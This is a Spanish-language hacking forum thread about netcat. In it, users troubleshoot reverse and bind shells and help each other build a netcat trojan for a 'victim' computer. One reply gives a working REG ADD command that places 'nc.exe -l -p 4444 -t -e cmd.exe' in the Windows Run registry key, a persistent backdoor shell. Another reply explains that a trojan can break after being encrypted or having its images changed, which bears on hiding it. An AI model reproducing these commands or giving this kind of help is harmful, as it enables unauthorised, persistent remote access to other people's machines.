Jugando con netcat

WHK · 29 Diciembre 2007, 18:32 PM

CitarD4RIO, yo estoy a la escucha en el puerto 80 y cuando el se intenta conectar a mi ip no se conecta, sin embargo, si lo hacemos al revés el si obtiene shell.

Eso significa que no puedes abrir tu puerto en forma pública, revisa tu router y esas cosas, también que no esté en uso ese puerto por otro programa o pc dentro de la misma red si usas router, verifica tu firewall ya que también algunos antivirus lo traen incorporado, etc... si puedes hacer inversa pero no directa es porque no se está abriendo el puerto sobre tu ip pública.

En linux ya viene incorporado el netcat y si no es asi puede bajarse su código fuente y compilarlo ./configure make etc.

WHK · 29 Diciembre 2007, 18:44 PM

Ya reestablecí todas las imagenes de los primeros post.

Enzo87 · 29 Diciembre 2007, 21:11 PM

Cita de: WHK en 29 Diciembre 2007, 18:32 PM
CitarD4RIO, yo estoy a la escucha en el puerto 80 y cuando el se intenta conectar a mi ip no se conecta, sin embargo, si lo hacemos al revés el si obtiene shell.
Eso significa que no puedes abrir tu puerto en forma pública, revisa tu router y esas cosas, también que no esté en uso ese puerto por otro programa o pc dentro de la misma red si usas router, verifica tu firewall ya que también algunos antivirus lo traen incorporado, etc... si puedes hacer inversa pero no directa es porque no se está abriendo el puerto sobre tu ip pública.

En linux ya viene incorporado el netcat y si no es asi puede bajarse su código fuente y compilarlo ./configure make etc.

Muchas gracias WHK. El puerto que uso es el 80, que ya debería estar abierto. Y sobre revisar el router, está complicado ya que mi ISP es Tele2 y son ellos los que acceden al router

De antivirus uso Antivir de Avira, que desactivé para hacer las pruebas y el cual no lleva Firewall. De firewall uso ZoneAlarm, y le di permisos al nc.

BBOYHACK · 6 Enero 2008, 07:58 AM

como podria hacer para incluir al netcat en las aplicaciones de inicio para cada ves que el equipo inicie se ative solo se que tendria que colocarlo aqui

(HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run)

pero como podria realizarlo desde (msdos) hay alguna forma

Novlucker · 6 Enero 2008, 08:27 AM

Desde ms-dos sería algo así

Código [Seleccionar]

REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v NOMBREQUEPREFIERAS /t REG_SZ /d RUTADETUBAT

Saludos

BBOYHACK · 6 Enero 2008, 09:33 AM

Cita de: Novlucker en 6 Enero 2008, 08:27 AM
Desde ms-dos sería algo así

Código [Seleccionar] Expandir
REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v NOMBREQUEPREFIERAS /t REG_SZ /d RUTADETUBAT

gracias ya lo pude incluir ahora cuando trato de incluirlo con un puerto ala escucha nada me da un error de

error:demasiados parametros de linia de comando

REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Nc /t REG_SZ /d C:nc.exe -l -p 4444 -t -e cmd.exe

eso es lo que coloco

Maestro Oscuro · 6 Enero 2008, 23:06 PM

BUen dia amigo... le escribo para pedirle ayuda en la comprensión de su explicación para crear el troyano con netcat... segui muy metodicamente los pasos que usted indico pero no funciono... en la computadora de la victima sale que no es una aplicación valida de Win32... me interesa mucho superar esta dificultad... le pido me ayude... realmente es importante...

Novlucker · 7 Enero 2008, 00:36 AM

BBOYHACK, al escribir eso te toma como si "C:\nc.exe -l -p" y "4444" fuesen parametros separados, e igualmente ocurre con los que siguen.

Intenta lo siguiente

Código [Seleccionar]

REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Nc /t REG_SZ /d "C:\nc.exe -l -p 4444 -t -e cmd.exe"

Saludos

BBOYHACK · 7 Enero 2008, 06:11 AM

Cita de: Maestro Oscuro en 6 Enero 2008, 23:06 PM
BUen dia amigo... le escribo para pedirle ayuda en la comprensión de su explicación para crear el troyano con netcat... segui muy metodicamente los pasos que usted indico pero no funciono... en la computadora de la victima sale que no es una aplicación valida de Win32... me interesa mucho superar esta dificultad... le pido me ayude... realmente es importante...

ok pero cual es tu problema en que parte del troyano tienes dudas dond te da el error

Novlucker · 7 Enero 2008, 06:19 AM

Citaren la computadora de la victima sale que no es una aplicación valida de Win32

En tu computadora que sale?? supongo que lo mismo verdad??

Algunas veces esto ocurre porque luego de encriptarlo o cambiarle las imagenes el archivo queda dañado, y deja de funcionar.

Saludos